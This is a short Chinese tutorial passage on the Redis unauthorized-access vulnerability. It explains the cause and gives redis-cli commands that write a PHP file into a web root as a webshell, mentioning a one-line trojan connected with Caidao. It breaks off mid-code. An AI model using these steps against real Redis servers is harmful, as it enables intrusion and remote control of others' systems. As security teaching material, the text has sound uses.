提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
中间件框架漏洞-Readis未授权访问漏洞
提示:以下是本篇文章正文内容,下面案例可供参考
一、Redis未授权原理
原理:简单的理解,当redis服务(6379)端口对外开放且未做密码认证时,任意用户可未授权访问redis服务并操作获取数据。
二、三种利用redis未授予权访问漏洞
1.利用redis写webshell
1.redis-cli -h 192.168.75.131
2.config set dir /var/www/html
3.config set dbfilename redis.php
4.set x "\r\n\r\n<?php phphinfo();?>\r\n\r\n" 这样就成功写如shell
可以写入一句话木马,菜刀连接
当数据库过大时,redis写shell的小技巧:(借鉴学习的)如下
<?php
set_time_limit(0